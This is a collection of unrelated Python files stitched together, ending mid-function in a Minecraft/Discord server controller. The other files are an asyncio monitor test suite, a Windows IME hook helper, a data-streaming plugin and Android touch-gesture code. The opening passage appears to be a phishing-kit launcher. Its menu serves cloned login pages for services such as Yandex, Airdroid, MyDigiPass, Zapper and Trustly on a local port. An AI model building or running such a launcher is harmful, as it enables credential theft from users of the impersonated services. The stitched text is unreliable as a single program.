port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Yandex passport" , port , "svg")
Serve_it(port)
Yandex()
main()
else:
main()
#Mobile Management Software
if choice == 6:
print """
1.Airdroid
00.Back To Main Menu
"""
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
#Airdroid
elif int(choice_2) == 1:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Airdroid" , port )
Serve_it(port)
Airdroid()
main()
else:
main()
#Other Services
if choice == 7:
print """
1.MyDigiPass
2.Zapper
3.Trustly App
4.Yelophone
00.Back To Main Menu
"""
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
#MyDigiPass
elif int(choice_2) == 1:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "MyDigiPass" , port )
Serve_it(port)
mydigipass()
main()
#Zapper
elif int(choice_2) == 2:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Zapper" , port )
Serve_it(port)
Zapper()
main()
#Trustly App
elif int(choice_2) == 3:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Trustly app" , port )
Serve_it(port)
Trustly_App()
main()
#Yelophone
elif int(choice_2) == 4:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Yelophone" , port )
Serve_it(port)
Yelophone()
main()
else:
main()
#Customization
if choice == 8:
print " 1.Add a new website."
print " 2.Use an existing website."
print " 3.Remove an existing website."
print " 00.Back To Main Menu"
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
elif int(choice_2) == 1:
Add_website()
elif int(choice_2) == 2:
Use_website()
elif int(choice_2) == 3:
Remove_website()
else:
main()
#settings.read(os.path.join('Data', 'Custom.ini'))
#sections = settings.sections()
#url = settings.get(section,"url")
#settings.add_section(name)
#settings.set(name,"url",url)
#settings.write(open(os.path.join('Data', 'Custom.ini'),"wb"))
else:
main()
if __name__ == '__main__':
main()
|
test_monitor.py
|
from __future__ import annotations
import asyncio
import sys
import time
from contextlib import contextmanager
from threading import Thread
from typing import Generator
import pytest
from pytest_mock import MockerFixture
import loopmon
@contextmanager
def with_event_loop() -> Generator[asyncio.AbstractEventLoop, None, None]:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
yield loop
loop.run_until_complete(asyncio.sleep(0))
to_cancel = asyncio.tasks.all_tasks(loop)
for t in to_cancel:
t.cancel()
results = loop.run_until_complete(asyncio.tasks.gather(*to_cancel, return_exceptions=True))
assert all(not isinstance(r, BaseException) for r in results)
loop.run_until_complete(loop.shutdown_asyncgens())
loop.close()
def test_can_catch_loop_close() -> None:
with with_event_loop() as loop: # type: asyncio.AbstractEventLoop
monitor = loopmon.create(loop)
# Give loop time to run loopmon
loop.run_until_complete(asyncio.sleep(0))
assert monitor.running
assert not monitor.running
def test_can_execute_callback(mocker: MockerFixture) -> None:
interval = 0.01
with with_event_loop() as loop: # type: asyncio.AbstractEventLoop
mock = mocker.AsyncMock()
monitor = loopmon.create(loop, interval=interval, callbacks=(mock,))
# Give loop time to run loopmon
loop.run_until_complete(asyncio.sleep(interval * 1.5))
assert monitor.running
mock.assert_awaited_once()
assert not monitor.running
def test_can_detect_lag_comes_from_block_call(mocker: MockerFixture) -> None:
interval = 0.01
blocking_delay = 0.1
with with_event_loop() as loop:
mock = mocker.AsyncMock()
monitor = loopmon.create(loop, interval=interval, callbacks=(mock,))
# Give loop time to run loopmon
loop.run_until_complete(asyncio.sleep(0))
assert monitor.running
# Block whole python interpreter
time.sleep(blocking_delay)
# Give loop time to run loopmon
loop.run_until_complete(asyncio.sleep(0))
mock.assert_awaited_once()
measured_lag = mock.await_args.args[0]
# 10% margin
assert blocking_delay * 0.9 <= measured_lag <= blocking_delay * 1.1
assert not monitor.running
def test_can_not_install_to_closed_loop() -> None:
loop = asyncio.new_event_loop()
loop.close()
with pytest.raises(ValueError):
loopmon.create(loop)
def test_can_not_install_to_already_installed_loop() -> None:
with with_event_loop() as loop: # type: asyncio.AbstractEventLoop
monitor = loopmon.create(loop)
with pytest.raises(ValueError):
monitor.install_to_loop(loop)
def test_can_not_double_start() -> None:
with with_event_loop() as loop: # type: asyncio.AbstractEventLoop
monitor = loopmon.create(loop)
# Give loop time to run loopmon
loop.run_until_complete(asyncio.sleep(0))
with pytest.raises(ValueError):
loop.run_until_complete(monitor.start())
@pytest.mark.skipif(sys.version_info < (3, 8), reason='requires python3.8 or higher')
def test_can_configure_task_name() -> None:
with with_event_loop() as loop: # type: asyncio.AbstractEventLoop
monitor = loopmon.create(loop, name='loopmon_task')
tasks = asyncio.all_tasks(loop)
assert any(t.get_name() == monitor.name for t in tasks)
def test_can_stop_running_monitor() -> None:
with with_event_loop() as loop: # type: asyncio.AbstractEventLoop
monitor = loopmon.create(loop, name='loopmon_task')
# Give loop time to run loopmon
loop.run_until_complete(asyncio.sleep(0))
assert monitor.running
loop.run_until_complete(monitor.stop())
assert not monitor.running
# Give loop time to stop loopmon
loop.run_until_complete(asyncio.sleep(0.1))
tasks = asyncio.all_tasks(loop)
assert not any(t.get_name() == monitor.name for t in tasks)
def test_can_detect_lag_of_another_thread(mocker: MockerFixture) -> None:
delay_sec = 1
interval = 0.1
def body_of_another_thread(mon: loopmon.EventLoopMonitor) -> None:
async def _inner() -> None:
mon.install_to_loop()
await asyncio.sleep(0)
assert mon.running
# block this thread -> `mon` must not collect during this blocking
time.sleep(delay_sec)
# Give mon time to collect lag
await asyncio.sleep(interval / 2)
await mon.stop()
assert not mon.running
asyncio.run(_inner())
with with_event_loop() as loop: # type: asyncio.AbstractEventLoop
mock_of_main_thread = mocker.AsyncMock()
monitor_of_main_thread = loopmon.create(loop, interval=interval, callbacks=(mock_of_main_thread,))
# Give loop time to run loopmon
loop.run_until_complete(asyncio.sleep(0))
mock_of_another_thread = mocker.AsyncMock()
monitor_of_another_thread = loopmon.SleepEventLoopMonitor(
interval=interval,
callbacks=(mock_of_another_thread,),
)
t = Thread(target=body_of_another_thread, args=(monitor_of_another_thread,))
t.start()
# this will block another thread and keep running main thread.
# so `monitor_of_main_thread` will keep running without any lag,
# but `monitor_of_main_thread` won't able to collect any data.
loop.run_until_complete(loop.run_in_executor(None, t.join))
loop.run_until_complete(asyncio.sleep(0))
loop.run_until_complete(monitor_of_main_thread.stop())
assert mock_of_main_thread.await_count == delay_sec / interval
assert mock_of_another_thread.await_count == 1
|
globalhook.py
|
# -*- coding: utf-8 -*-
import ctypes
from os.path import join, dirname, abspath
INVALID_VALUE = 0xffff
WM_IMESUPPORT_SET_INLINE_POSITION = -1
imesupport_dll = None
def setup(arch_x64, dll_dir=dirname(dirname(abspath(__file__)))):
# Default DLL location: ../imesupport_hook_xxx.dll
global imesupport_dll
global WM_IMESUPPORT_SET_INLINE_POSITION
if imesupport_dll is not None:
return True
imesupport_dll = ctypes.cdll.LoadLibrary(
join(dll_dir,
'imesupport_hook_x64.dll' if arch_x64 else
'imesupport_hook_x86.dll'
))
WM_IMESUPPORT_SET_INLINE_POSITION = imesupport_dll.GetMessageId()
return imesupport_dll.StartHook()
def term():
global imesupport_dll
if imesupport_dll is not None:
imesupport_dll.EndHook()
del imesupport_dll
imesupport_dll = None
def set_inline_position(hwnd, x, y, font_face, font_height):
# TODO Use font_face
if imesupport_dll is not None:
ctypes.windll.user32.PostMessageW(
hwnd, WM_IMESUPPORT_SET_INLINE_POSITION, x << 16 | y, font_height)
def clear_inline_position(hwnd):
if imesupport_dll is not None:
ctypes.windll.user32.PostMessageW(
hwnd, WM_IMESUPPORT_SET_INLINE_POSITION, INVALID_VALUE, INVALID_VALUE)
def main():
import time
from multiprocessing import Process
p = Process(target=window_process)
p.start()
time.sleep(1)
test()
p.join()
TEST_CLASSNAME = 'test_win32gui_1'
def test():
x = 100
y = 100
font_height = 40
import platform
assert setup(platform.machine() == 'AMD64')
hwnd = ctypes.windll.user32.FindWindowW(TEST_CLASSNAME, 0)
assert hwnd != 0
set_inline_position(hwnd, x, y, 'font', font_height)
def window_process():
# Required pywin32
import win32gui
import win32con
import time
# Original: http://kb.worldviz.com/articles/791
def OnKeyDown(hwnd, msg, wp, lp):
print('Original OnKeyDown')
def OnClose(hwnd, msg, wparam, lparam):
"""Destroy window when it is closed by user"""
win32gui.DestroyWindow(hwnd)
def OnDestroy(hwnd, msg, wparam, lparam):
"""Quit application when window is destroyed"""
win32gui.PostQuitMessage(0)
#Define message map for window
wndproc = {
win32con.WM_KEYDOWN: OnKeyDown,
win32con.WM_CLOSE: OnClose,
win32con.WM_DESTROY: OnDestroy
}
def CreateWindow(title, message_map, location):
"""Create a window with defined title, message map, and rectangle"""
l, t, r, b = location
wc = win32gui.WNDCLASS()
wc.lpszClassName = TEST_CLASSNAME
wc.style = win32con.CS_GLOBALCLASS | win32con.CS_VREDRAW | win32con.CS_HREDRAW
wc.hbrBackground = win32con.COLOR_WINDOW + 1
wc.hCursor = win32gui.LoadCursor(0, win32con.IDC_ARROW)
wc.lpfnWndProc = message_map
win32gui.RegisterClass(wc)
win32gui.CreateWindow(wc.lpszClassName,
title,
win32con.WS_CAPTION | win32con.WS_VISIBLE | win32con.WS_SYSMENU,
l, t, r, b, 0, 0, 0, None)
while win32gui.PumpWaitingMessages() == 0:
time.sleep(0.01)
win32gui.UnregisterClass(wc.lpszClassName, None)
#Display sample window
CreateWindow('Pywin32 sample', wndproc, (100, 100, 500, 200))
if __name__ == '__main__':
main()
|
dev_orb_plugin.py
|
#!/usr/bin/python
import os
import sys
import pickle
import time
import subprocess
import threading
import shutil
from pyon.public import CFG
class DataAgentPrototype():
def __init__(self, plugin):
self.sampling_gl = None
self.sampling_gl_done = None
self.plugin = plugin
self.streaming_args = None
def on_start_streaming(self, streaming_args):
print 'DataAgent.on_start_streaming'
self.plugin.on_start_streaming(streaming_args)
self.streaming_args = streaming_args
self.sampling_gl_done = threading.Event()
self.sampling_gl = threading.Thread(target=self._sample_data_loop)
self.sampling_gl.start()
def on_stop_streaming(self):
print 'DataAgent.on_stop_streaming'
self.plugin.on_stop_streaming()
self.sampling_gl_done.set()
self.sampling_gl.join()
def _sample_data_loop(self):
print 'Sampling greenlet started.'
while not self.sampling_gl_done.is_set():
time.sleep(self.streaming_args['sample_interval'])
self.plugin.acquire_samples()
print 'sampling greenlet done, exiting.'
class OrbPluginPrototype():
def __init__(self):
self.proc = None
self.acquire_thread = None
self.streaming_args = None
def on_start_streaming(self, streaming_args):
print 'OrbPluginPrototype.on_start_streaming'
self.streaming_args = streaming_args
cmd_args = ['orb_reap', './orbstart.py', streaming_args['orb_name'], streaming_args['select']]
if 'reject' in streaming_args:
cmd_args.append('--reject').append(streaming_args['reject'])
if 'after' in streaming_args:
cmd_args.append('--after').append(streaming_args['after'])
if 'timeout' in streaming_args:
cmd_args.append('--timeout').append(streaming_args['timeout'])
if 'qsize' in streaming_args:
cmd_args.append('--qsize').append(streaming_args['qsize'])
print str(cmd_args)
antelope_path = CFG.get_safe("scion.antelope.path", "/opt/antelope/5.6")
self.proc = subprocess.Popen(cmd_args, executable=antelope_path+'/bin/python')
print 'Orb reap process started, ', self.proc.pid
self.data_dir = '/tmp/scion-data/%s/' % (streaming_args['select'].replace('/', '-'))
def on_stop_streaming(self):
print 'OrbPluginPrototype.on_stop_streaming'
self.proc.terminate()
print 'Waiting for orb reap to terminate...'
retcode = self.proc.wait()
print 'Orb reap process terminated, ', self.proc.pid
self.proc = None
def acquire_samples(self):
print 'Plugin acquiring samples...'
if os.path.exists(self.data_dir):
files = os.listdir(self.data_dir)
print 'Samples present: '
for f in files:
fpath = self.data_dir + f
print fpath
if __name__ == '__main__':
# This test code is a placeholder for the
# SciON DataAgent control flow so we can
# port it over easily.
# Coming in from the agent config.
streaming_args = {
'orb_name': 'taexport.ucsd.edu:usarrayTA',
# 'select' : 'TA_109C/MGENC/M40',
'select': 'TA_121A/MGENC/M40',
'--timeout': 5,
'sample_interval': 5
}
# Agent config specifies which class to construct.
plugin = OrbPluginPrototype()
# DataAgent
agent = DataAgentPrototype(plugin)
# Start streaming.
agent.on_start_streaming(streaming_args)
# Time passes.
time.sleep(30)
# DataAgent on_stop_streaming is activated.
agent.on_stop_streaming()
|
base_touch.py
|
# -*- coding: utf-8 -*-
import threading
import time
import six
from six.moves import queue
from airtest.utils.logger import get_logger
from airtest.utils.snippet import (on_method_ready, ready_method, reg_cleanup, kill_proc)
LOGGING = get_logger(__name__)
class BaseTouch(object):
"""
A super class for Minitouch or Maxtouch
"""
def __init__(self, adb, backend=False, ori_function=None, input_event=None, *args, **kwargs):
self.adb = adb
self.backend = backend
self.server_proc = None
self.client = None
self.size_info = None
self.input_event = input_event
self.handle = None
self.ori_function = ori_function if callable(ori_function) else self.adb.getPhysicalDisplayInfo
self.default_pressure = 50
self.path_in_android = ""
reg_cleanup(self.teardown)
@ready_method
def install_and_setup(self):
"""
Install and setup airtest touch
Returns:
None
"""
self.install()
self.size_info = self.ori_function()
self.setup_server()
if self.backend:
self.setup_client_backend()
else:
self.setup_client()
def uninstall(self):
"""
Uninstall airtest touch
Returns:
None
"""
raise NotImplemented
def install(self):
"""
Install airtest touch
Returns:
None
"""
raise NotImplemented
def setup_server(self):
"""
Setip touch server and adb forward
Returns:
server process
"""
raise NotImplemented
def safe_send(self, data):
"""
Send data to client
Args:
data: data to send
Raises:
Exception: when data cannot be sent
Returns:
None
"""
if isinstance(data, six.text_type):
data = data.encode('utf-8')
try:
self.client.send(data)
except Exception as err:
# raise MinitouchError(err)
raise err
def _backend_worker(self):
"""
Backend worker queue thread
Returns:
None
"""
while not self.backend_stop_event.isSet():
cmd = self.backend_queue.get()
if cmd is None:
break
self.safe_send(cmd)
def setup_client_backend(self):
"""
Setup backend client thread as daemon
Returns:
None
"""
self.backend_queue = queue.Queue()
self.backend_stop_event = threading.Event()
self.setup_client()
t = threading.Thread(target=self._backend_worker, name="airtouch")
# t.daemon = True
t.start()
self.backend_thread = t
self.handle = self.backend_queue.put
def setup_client(self):
"""
Setup client
Returns:
None
"""
raise NotImplemented
def teardown(self):
"""
Stop the server and client
Returns:
None
"""
if hasattr(self, "backend_stop_event"):
self.backend_stop_event.set()
self.backend_queue.put(None)
if self.client:
self.client.close()
if self.server_proc:
kill_proc(self.server_proc)
def transform_xy(self, x, y):
"""
Transform coordinates (x, y) according to the device display
Args:
x: coordinate x
y: coordinate y
Returns:
transformed coordinates (x, y)
"""
return x, y
@on_method_ready('install_and_setup')
def perform(self, motion_events, interval=0.01):
"""
Perform a sequence of motion events including: UpEvent, DownEvent, MoveEvent, SleepEvent
Args:
motion_events: a list of MotionEvent instances
interval: minimum interval between events
Returns:
None
"""
for event in motion_events:
if isinstance(event, SleepEvent):
time.sleep(event.seconds)
else:
cmd = event.getcmd(transform=self.transform_xy)
self.handle(cmd)
time.sleep(interval)
@on_method_ready('install_and_setup')
def touch(self, tuple_xy, duration=0.01):
"""
Perform touch event
minitouch protocol example::
d 0 10 10 50
c
<wait in your own code>
u 0
c
Args:
tuple_xy: coordinates (x, y)
duration: time interval for touch event, default is 0.01
Returns:
None
"""
touch_events = [DownEvent(tuple_xy, pressure=self.default_pressure), SleepEvent(duration), UpEvent()]
self.perform(touch_events)
def __swipe_move(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5):
"""
Return a sequence of swipe motion events (only MoveEvent)
minitouch protocol example::
d 0 0 0 50
c
m 0 20 0 50
c
m 0 40 0 50
c
m 0 60 0 50
c
m 0 80 0 50
c
m 0 100 0 50
c
u 0
c
Args:
tuple_from_xy: start point
tuple_to_xy: end point
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
Returns:
[MoveEvent(from_x, from_y), ..., MoveEvent(to_x, to_y)]
"""
from_x, from_y = tuple_from_xy
to_x, to_y = tuple_to_xy
ret = []
interval = float(duration) / (steps + 1)
for i in range(1, steps):
ret.append(MoveEvent((from_x + (to_x - from_x) * i / steps,
from_y + (to_y - from_y) * i / steps)))
ret.append(SleepEvent(interval))
ret += [MoveEvent((to_x, to_y), pressure=self.default_pressure), SleepEvent(interval)]
return ret
@on_method_ready('install_and_setup')
def swipe_along(self, coordinates_list, duration=0.8, steps=5):
"""
Perform swipe event across multiple points in sequence.
Args:
coordinates_list: list of coordinates: [(x1, y1), (x2, y2), (x3, y3)]
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
Returns:
None
"""
tuple_from_xy = coordinates_list[0]
swipe_events = [DownEvent(tuple_from_xy, pressure=self.default_pressure), SleepEvent(0.1)]
for tuple_to_xy in coordinates_list[1:]:
swipe_events += self.__swipe_move(tuple_from_xy, tuple_to_xy, duration=duration, steps=steps)
tuple_from_xy = tuple_to_xy
swipe_events.append(UpEvent())
self.perform(swipe_events)
@on_method_ready('install_and_setup')
def swipe(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5):
"""
Perform swipe event.
Args:
tuple_from_xy: start point
tuple_to_xy: end point
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
Returns:
None
"""
swipe_events = [DownEvent(tuple_from_xy, pressure=self.default_pressure), SleepEvent(0.1)]
swipe_events += self.__swipe_move(tuple_from_xy, tuple_to_xy, duration=duration, steps=steps)
swipe_events.append(UpEvent())
self.perform(swipe_events)
@on_method_ready('install_and_setup')
def two_finger_swipe(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5, offset=(0, 50)):
"""
Perform two finger swipe action
minitouch protocol example::
d 0 0 0 50
d 1 1 0 50
c
m 0 20 0 50
m 1 21 0 50
c
m 0 40 0 50
m 1 41 0 50
c
m 0 60 0 50
m 1 61 0 50
c
m 0 80 0 50
m 1 81 0 50
c
m 0 100 0 50
m 1 101 0 50
c
u 0
u 1
c
Args:
tuple_from_xy: start point
tuple_to_xy: end point
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
offset: coordinate offset of the second finger, default is (0, 50)
Returns:
None
"""
from_x, from_y = tuple_from_xy
to_x, to_y = tuple_to_xy
# 根据偏移量计算第二个手指的坐标
from_x2, from_y2 = (min(max(0, from_x + offset[0]), self.size_info['width']),
min(max(0, from_y + offset[1]), self.size_info['height']))
to_x2, to_y2 = (min(max(0, to_x + offset[0]), self.size_info['width']),
min(max(0, to_y + offset[1]), self.size_info['height']))
swipe_events = [DownEvent(tuple_from_xy, contact=0, pressure=self.default_pressure),
DownEvent((from_x2, from_y2), contact=1, pressure=self.default_pressure),
]
interval = float(duration) / (steps + 1)
for i in range(1, steps + 1):
move_events = [
SleepEvent(interval),
MoveEvent((from_x + ((to_x - from_x) * i / steps), from_y + (to_y - from_y) * i / steps),
contact=0, pressure=self.default_pressure),
MoveEvent((from_x2 + (to_x2 - from_x2) * i / steps, from_y2 + (to_y2 - from_y2) * i / steps),
contact=1, pressure=self.default_pressure),
]
swipe_events.extend(move_events)
swipe_events.extend([UpEvent(contact=0), UpEvent(contact=1)])
self.perform(swipe_events)
@on_method_ready('install_and_setup')
def pinch(self, center=None, percent=0.5, duration=0.5, steps=5, in_or_out='in'):
"""
Perform pinch action
minitouch protocol example::
d 0 0 100 50
d 1 100 0 50
c
m 0 10 90 50
m 1 90 10 50
c
m 0 20 80 50
m 1 80 20 50
c
m 0 20 80 50
m 1 80 20 50
c
m 0 30 70 50
m 1 70 30 50
c
m 0 40 60 50
m 1 60 40 50
c
m 0 50 50 50
m 1 50 50 50
c
u 0
u 1
c
Args:
center: the center point of the pinch operation
percent: pinch distance to half of screen, default is 0.5
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
in_or_out: pinch in or pinch out, default is 'in'
Returns:
None
Raises:
TypeError: An error occurred when center is not a list/tuple or None
"""
w, h = self.size_info['width'], self.size_info['height']
if isinstance(center, (list, tuple)):
x0, y0 = center
elif center is None:
x0, y0 = w / 2, h / 2
else:
raise TypeError("center should be None or list/tuple, not %s" % repr(center))
x1, y1 = x0 - w * percent / 2, y0 - h * percent / 2
x2, y2 = x0 + w * percent / 2, y0 + h * percent / 2
pinch_events = []
interval = float(duration) / (steps + 1)
# 根据in还是out,设定双指滑动的起始和结束坐标
if in_or_out == 'in':
start_pos1_x, start_pos1_y = x1, y1
start_pos2_x, start_pos2_y = x2, y2
end_pos1_x, end_pos1_y = x0, y0
end_pos2_x, end_pos2_y = x0, y0
else:
start_pos1_x, start_pos1_y = x0, y0
start_pos2_x, start_pos2_y = x0, y0
end_pos1_x, end_pos1_y = x1, y1
end_pos2_x, end_pos2_y = x2, y2
# 开始定义pinch的操作
pinch_events.extend([
DownEvent((start_pos1_x, start_pos1_y), contact=0, pressure=self.default_pressure),
DownEvent((start_pos2_x, start_pos2_y), contact=1, pressure=self.default_pressure)
])
for i in range(1, steps):
pinch_events.extend([
SleepEvent(interval),
MoveEvent((start_pos1_x + (end_pos1_x - start_pos1_x) * i / steps,
start_pos1_y + (end_pos1_y - start_pos1_y) * i / steps),
contact=0, pressure=self.default_pressure),
MoveEvent((start_pos2_x + (end_pos2_x - start_pos2_x) * i / steps,
start_pos2_y + (end_pos2_y - start_pos2_y) * i / steps),
contact=1, pressure=self.default_pressure)
])
pinch_events.extend([
SleepEvent(interval),
MoveEvent((end_pos1_x, end_pos1_y), contact=0, pressure=self.default_pressure),
MoveEvent((end_pos2_x, end_pos2_y), contact=1, pressure=self.default_pressure)
])
pinch_events.extend([UpEvent(contact=0), UpEvent(contact=1)])
self.perform(pinch_events)
@on_method_ready('install_and_setup')
def operate(self, args):
"""
Perform down, up and move actions
Args:
args: action arguments, dictionary containing type and x, y coordinates, e.g.::
{
"type" : "down",
"x" : 10,
"y" : 10
}
Raises:
RuntimeError: is invalid arguments are provided
Returns:
None
"""
if args["type"] == "down":
x, y = self.transform_xy(args["x"], args["y"])
cmd = "d 0 {x} {y} {pressure}\nc\n".format(x=x, y=y, pressure=self.default_pressure)
elif args["type"] == "move":
x, y = self.transform_xy(args["x"], args["y"])
cmd = "m 0 {x} {y} {pressure}\nc\n".format(x=x, y=y, pressure=self.default_pressure)
elif args["type"] == "up":
cmd = "u 0\nc\n"
else:
raise RuntimeError("invalid operate args: {}".format(args))
self.handle(cmd)
class MotionEvent(object):
"""
Motion Event to be performed by Minitouch/Maxtouch
"""
def getcmd(self, transform=None):
raise NotImplementedError
class DownEvent(MotionEvent):
def __init__(self, coordinates, contact=0, pressure=50):
"""
Finger Down Event
:param coordinates: finger down coordinates in (x, y)
:param contact: multi-touch action, starts from 0
:param pressure: touch pressure
"""
super(DownEvent, self).__init__()
self.coordinates = coordinates
self.contact = contact
self.pressure = pressure
def getcmd(self, transform=None):
if transform:
x, y = transform(*self.coordinates)
else:
x, y = self.coordinates
cmd = "d {contact} {x} {y} {pressure}\nc\n".format(contact=self.contact, x=x, y=y, pressure=self.pressure)
return cmd
class UpEvent(MotionEvent):
def __init__(self, contact=0):
"""
Finger Up Event
:param contact: multi-touch action, starts from 0
"""
super(UpEvent, self).__init__()
self.contact = contact
def getcmd(self, transform=None):
cmd = "u {:.0f}\nc\n".format(self.contact)
return cmd
class MoveEvent(MotionEvent):
def __init__(self, coordinates, contact=0, pressure=50):
"""
Finger Move Event
:param coordinates: finger move to coordinates in (x, y)
:param contact: multi-touch action, starts from 0
:param pressure: touch pressure
"""
super(MoveEvent, self).__init__()
self.coordinates = coordinates
self.contact = contact
self.pressure = pressure
def getcmd(self, transform=None):
if transform:
x, y = transform(*self.coordinates)
else:
x, y = self.coordinates
cmd = "m {contact} {x} {y} {pressure}\nc\n".format(contact=self.contact, x=x, y=y, pressure=self.pressure)
return cmd
class SleepEvent(MotionEvent):
def __init__(self, seconds):
self.seconds = seconds
def getcmd(self, transform=None):
return None
|
minecraft.py
|
import asyncio
import dotenv as de
import multiprocessing as mp
import multiprocessing.connection as mpc
import os
import re
import subprocess as sp
import threading
import time
__all__ = ['Minecraft']
# Consts
DISCORD_MSG_LEN_MAX = 1990 # Leave a little room for error
# Load Env
de.load_dotenv()
SECRET = str.encode(os.getenv('SECRET'))
BOT_CHAN_ID = int(os.getenv('BOT_CHAN_ID'))
MC_LOG_CHAN_ID = int(os.getenv('MC_LOG_CHAN_ID'))
MC_DIR = os.getenv('MC_DIR')
MCC_PORT = int(os.getenv('MCC_PORT'))
MC_PREFIX = os.getenv('MC_PREFIX')
MC_START_TIMEOUT = int(os.getenv('MC_START_TIMEOUT'))
# Globals (for controller)
proc = None
conn = None
class Minecraft:
"""
Class for importing by the serverbot. It will handle all communication with the Minecraft
Controller (the functionality implemented by the rest of this module.
Just initialize it and register the send function for callback with the prefix
"""
def __init__(self,
client,
guild,
prefix=MC_PREFIX,
port=MCC_PORT,
botchanid=BOT_CHAN_ID,
logchanid=MC_LOG_CHAN_ID):
"""
Initializes a new Minecraft object for communicating with a Minecraft Controller.
Args:
client: The Discord client to interact with
guild: The Discord server (guild) the bot should respond on
prefix: (Optional) The Discord server prefix. Defaults to env var
port: (Optional) The port to run the Minecraft controller on. Defaults to
environment variable
botchanid: (Optional) The id of the Discord server bot channel. Defaults to environment
variable
logchanid: (Optional) The id of the Discord server Minecraft log channel. Defaults to
environment variable
Returns:
A newly initialized Minecraft object
"""
# Set up members
self.prefix = prefix
self.port = port
self.guild = guild
self.client = client
self.logchan = guild.get_channel(logchanid)
self.botchan = guild.get_channel(botchanid)
self.__conn = None
def read_thread():
"""
Launch the read thread. This will attempt to create a connection to a mc server
controller and listen for incoming data. This thread will stay alive until the process
closes.
"""
while True:
# First connect to the server
try:
self.__conn = mpc.Client(('localhost', port), authkey=SECRET)
self.__botchan_send('Minecraft server manager connected!')
# Leaving unassigned or closing skips the next loop
except (EOFError, ConnectionRefusedError, ConnectionResetError, BrokenPipeError):
if self.__conn is not None:
self.__conn.close()
time.sleep(10) # Wait a reasonable amount of time and chek again
# Read loop
while self.__conn and (not self.__conn.closed):
# Try to read and direct messages appropriately
try:
line = self.__conn.recv()
[status, msg] = line.split('|', 1)
status = status.strip()
if status == 'LOG':
self.__logchan_send(msg)
elif status == 'OK':
self.__botchan_send(msg)
else:
self.__botchan_send(f'{status}: {msg}')
# Close the connection so we end the loop and try to reconnect at the top
except (EOFError, ConnectionResetError, BrokenPipeError):
self.__botchan_send('ERR: The Minecraft server manager crashed. Attempting '
'to reconnect')
self.__conn.close()
# Start a daemon reader thread
reader = threading.Thread(target=read_thread)
reader.daemon = True
reader.start()
def try_send(self, msg):
"""
Try to send a message to the controller. If we fail, print an error to the bot channel. We
don't need to handle the failure here since the reader reads in a tight loop so a connection
failure will be caught there as well and will trigger a reconnect.
Args:
msg: The message to try to send
"""
try:
self.__conn.send(msg)
except (OSError, AttributeError):
# We lost connection. We'll just log it and let the read loop handle reconnecting
self.__botchan_send('Could not send command to Minecraft server manager')
def __logchan_send(self, msg):
"""
Send a message to the log channel.
Args:
msg: The message to send
"""
asyncio.run_coroutine_threadsafe(self.logchan.send(msg), self.client.loop)
def __botchan_send(self, msg):
"""
Send a message to the bot channel.
Args:
msg: The message to send
"""
asyncio.run_coroutine_threadsafe(self.botchan.send(msg), self.client.loop)
def mc_running():
"""
Check if the Minecraft server process is running.
Returns:
True if the server process is running, False otherwise
"""
return proc and proc.poll() is None
def try_send(msg):
"""
Try to send a message to the connected client (usually serverbot). We don't need to handle the
failure here since the reader reads in a tight loop so a connection failure will be caught there
as well and will trigger a reconnect. We also can't send an error message since the client isn't
connected to receive the message so we'll just fail silently.
Args:
msg: The message to try to send
"""
try:
conn.send(msg + '\n')
except (OSError, AttributeError):
# Since we lost connection to the client we can't really notify them there's an issues so
# just log it and fail
print(f'try_send: Failed to send: {msg}')
def mc_writeline(cmd):
"""
Try to send a message to the Minecraft process. We don't need to hand the failure here since the
reader will catch it and mark the server dead.
Args:
cmd: The Minecraft command to send
Returns:
True if successful, False otherwise
"""
try:
proc.stdin.write(str.encode(f'{cmd}\n'))
proc.stdin.flush()
return True
except AttributeError:
print(f'mc_writeline: Server is dead')
return False
def mc_start():
"""
Start a new Minecraft process and spin up a listener thread to handle incoming data.
Returns:
True if the server was started successfully, False otherwise (e.g. if server is already
running)
"""
global proc
# Fastfail if the server is running, else start it
if mc_running():
return False
else:
proc = sp.Popen(['java', '-Xmx1024M', '-Xms1024M', '-jar', 'server.jar', 'nogui'],
stdin=sp.PIPE,
stdout=sp.PIPE,
stderr=sp.STDOUT,
cwd=MC_DIR)
# Wait for the server to start up to the specified timeout
line = ''
startup_buf = ''
start_time = time.time()
timeout = MC_START_TIMEOUT #seconds
res = re.compile('\[[0-9:]+\] \[Server thread/INFO\]: Done \([0-9.]+s\)\! For help, type "help"')
# Look for the statup line
while not res.match(line.strip()):
# Check timeout
if time.time() > (start_time + timeout):
try_send(f'LOG |{startup_buf}')
return False
# Fetch a new line. If the read fails, dump the log and fail
try:
line = bytes.decode(proc.stdout.readline())
except BrokenPipeError:
try_send(f'LOG |{startup_buf}')
return False
# Dump the current log if we would go over the max message size
if len(startup_buf) > (DISCORD_MSG_LEN_MAX - len(line)):
try_send(f'LOG |{startup_buf}')
startup_buf = ''
# Add the current line to the buf
startup_buf += line
# Dump the buffer
if startup_buf:
try_send(f'LOG |{startup_buf}')
# TODO: add Event to close readur during stop
# Start a reader for this process
def read_thread():
"""
Launch the reader thread. This will attempt to read from the Minecraft process and send
it to the client (serverbot) to process. If a send fails, it will keep retrying until it
succeeds. If a read fails, we continue and the top loop will catch the dead proces and
report it to the client (serverbot)
"""
